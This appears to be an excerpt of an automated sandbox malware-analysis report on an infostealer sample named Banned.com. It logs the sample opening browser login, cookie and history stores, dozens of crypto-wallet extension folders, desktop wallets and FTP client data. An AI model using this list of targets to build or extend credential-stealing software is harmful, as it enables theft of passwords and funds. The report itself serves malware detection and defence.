      Source: extrac32.exe, 00000009.00000002.2070320335.0000000006468000.00000004.00000020.00020000.00000000.sdmp, Banned.com, 0000000D.00000000.2078597505.0000000000773000.00000002.00000001.01000000.00000007.sdmp, Race.9.dr, Banned.com.2.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\!Set-up..exe | Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
